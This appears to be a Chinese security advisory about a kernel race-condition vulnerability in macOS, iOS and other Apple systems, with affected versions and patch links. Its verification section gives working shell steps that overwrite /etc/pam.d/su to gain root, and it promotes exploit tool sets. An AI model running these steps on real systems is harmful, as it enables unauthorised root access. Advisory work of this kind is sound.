点击蓝字 关注我们

遵纪守法

任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

Apple 多个产品内核存在条件竞争漏洞，成功利用此漏洞的攻击者可使用内核权限执行任意代码。

风险等级

高危

影响版本

macOS 13.0.1 / 12.6.1（或更低版本）

tvOS < 16.2

iOS / iPadOS < 16.2

iOS / iPadOS < 15.7.2

watchOS < 9.2

漏洞验证

以macOS为例

clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

「poc」

https://github.com/zhuowei/MacDirtyCowDemo

修复方案

目前官方已发布可更新版本，建议受影响用户升级至补丁版本

https://support.apple.com/en-us/HT213531

https://support.apple.com/en-us/HT213532

https://support.apple.com/en-us/HT213530

https://support.apple.com/en-us/HT213535

https://support.apple.com/en-us/HT213536

https://support.apple.com/en-us/HT213533

https://support.apple.com/en-us/HT213534

另外关注公众号后台回复“框架RCE”可获取常见框架漏洞利用工具，后台回复“pentest”获取常用渗透测试工具集。回复“apk11”获取apk测试工具集。

关注公众号

下面就是团队的公众号啦，更新的文章都会在第一时间推送在公众号

63篇原创内容

支持作者